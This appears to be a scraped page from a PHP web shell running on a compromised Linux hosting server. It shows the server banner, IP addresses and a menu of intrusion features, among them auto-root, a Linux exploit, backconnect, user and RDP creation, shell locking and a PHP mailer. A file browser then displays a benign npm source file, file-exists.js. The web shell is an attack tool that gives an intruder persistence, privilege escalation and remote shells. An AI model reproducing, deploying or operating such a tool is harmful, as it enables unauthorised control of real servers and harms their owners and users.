Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
libnpmexec /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
file-exists.js
645
B
-rw-r--r--
get-bin-from-manifest.js
640
B
-rw-r--r--
index.js
8.01
KB
-rw-r--r--
is-windows.js
46
B
-rw-r--r--
no-tty.js
44
B
-rw-r--r--
run-script.js
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : file-exists.js
const { resolve } = require('path') const fs = require('@npmcli/fs') const walkUp = require('walk-up-path') const fileExists = async (file) => { try { const res = await fs.stat(file) return res.isFile() } catch { return false } } const localFileExists = async (dir, binName, root) => { for (const path of walkUp(dir)) { const binDir = resolve(path, 'node_modules', '.bin') if (await fileExists(resolve(binDir, binName))) { return binDir } if (path.toLowerCase() === resolve(root).toLowerCase()) { return false } } return false } module.exports = { fileExists, localFileExists, }
Close